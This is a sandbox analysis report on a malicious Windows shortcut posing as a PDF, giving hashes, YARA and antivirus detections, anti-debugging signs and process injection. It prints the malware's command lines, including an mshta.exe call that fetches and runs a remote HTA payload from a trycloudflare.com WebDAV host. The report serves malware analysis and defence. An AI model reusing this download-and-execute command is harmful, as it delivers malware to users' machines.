Favorites
Tools
Dr.Zero Chatbot
Notifications
Guide 2020-06-10
Version history 2020-06-10

latestReport
04.27 08:04
main-292e27553c8f5cb8....
04.27 08:04
6814.91bf0d11abffee40....
04.27 08:04
polyfills-c67a75d1b6f9...
04.27 08:04
framework-ca706bf673a1...
04.27 08:04
ee8b1517-cc4d7300db272...
04.27 08:04
_app-8a13ca4ac05f979e....
04.27 08:04
webpack-6751726d88b2d8...
04.27 08:04
gtm.js.pobrane
04.27 08:04
290-f42c07d7b35e4d71.j...
04.27 08:04
75fc9c18-02b28d24f737c...

Latest News
04.28 02:04
Quick and Easy Digital...
04.28 01:04
Überwachung per KI-Per...
04.28 01:04
Cluely: Wie eine Schum...
04.28 12:04
Huawei Set to Test Pow...
04.28 12:04
윈도우 11 보안 기능 VBS Encla...
04.28 12:04
Big Tech’s Earnings Pr...
04.27 11:04
VESC Mods Made Via Vib...
04.27 09:04
Apple Begins Breaking ...
04.27 08:04
Save Cells from the La...
04.27 07:04
Golang backdoor with a...

Summary | ZeroBOX

RE_007394029384393483.pdf.lnk

Generic Malware AntiVM Lnk Format AntiDebug GIF Format

Category	Machine	Started	Completed
FILE	s1_win7_x6401	April 17, 2025, 10:01 a.m.	April 17, 2025, 10:03 a.m.

Size	2.8KB
Type	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Icon number=11, Archive, ctime=Fri Sep 14 22:12:47 2018, mtime=Fri Sep 14 22:12:47 2018, atime=Fri Sep 14 22:12:47 2018, length=14848, window=hidenormalshowminimized
MD5	`bd198f0891ebf2cc898a80cd9c83c686`
SHA256	`7256a6cf74ab073f52056a719f3d9b20b0aea7a6fe52cc6e0b69d2bfb7944f26`
CRC32	`33EDEA76`
ssdeep	`24:8uK5b+Jj4d8A6Z+/ee1CmqddNXuHYan7E58LkCj+7S7F2JQvMz6shxCOMB/g063v:86JcoVdLXuHz7Jk7gF2Jqs3MBY0YW+`
Yara	lnk_file_format - Microsoft Windows Shortcut File Format Lnk_Format_Zero - LNK Format Generic_Malware_Zero - Generic Malware

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "tUrJsdJA" C:\Users\test22\AppData\Local\Temp\RE_007394029384393483.pdf.lnk
2556
- mshta.exe "C:\Windows\System32\mshta.exe" "\\flexibility-soldiers-photo-dealer.trycloudflare.com@SSL\DavWWWRoot\ray.hta"
  2668

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx April 17, 2025, 10:01 a.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory April 17, 2025, 10:01 a.m.	process_identifier: 2668 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73352000 process_handle: 0xffffffff	1	0	0

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\RE_007394029384393483.pdf.lnk

Creates a suspicious process (1 event)

cmdline

"C:\Windows\System32\mshta.exe" "\\flexibility-soldiers-photo-dealer.trycloudflare.com@SSL\DavWWWRoot\ray.hta"

Yara rule detected in process memory (8 events)

description	(no description)				rule	DebuggerCheck__GlobalFlags
description	(no description)				rule	DebuggerCheck__QueryInfo
description	(no description)				rule	DebuggerHiding__Thread
description	(no description)				rule	DebuggerHiding__Active
description	(no description)				rule	ThreadControl__Context
description	(no description)				rule	SEH__vectored
description	Checks if being debugged				rule	anti_dbg
description	Bypass DEP				rule	disable_dep

File has been identified by 14 AntiVirus engines on VirusTotal as malicious (14 events)

VirIT	Trojan.LNK.Heur.A
ESET-NOD32	LNK/Agent.AHN
Avast	CMD:Agent-DK [Drp]
Kaspersky	HEUR:Trojan-Downloader.WinLNK.Agent.gen
Rising	Downloader.Agent/LNK!1.128EB (CLASSIC)
Sophos	Troj/DownLnk-CJ
Google	Detected
ZoneAlarm	Troj/DownLnk-CJ
Varist	LNK/Agent.JW.gen!Eldorado
Zoner	Probably Heur.LNKScript
Tencent	Win32.Trojan-Downloader.Agent.Kqil
huorong	TrojanDownloader/LNK.Agent.da
Fortinet	LNK/Agent.AHN!tr
AVG	CMD:Agent-DK [Drp]

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2556 resumed a thread in remote process 2668
NtResumeThread April 17, 2025, 10:01 a.m.	thread_handle: 0x00000334 suspend_count: 1 process_identifier: 2668	1	0	0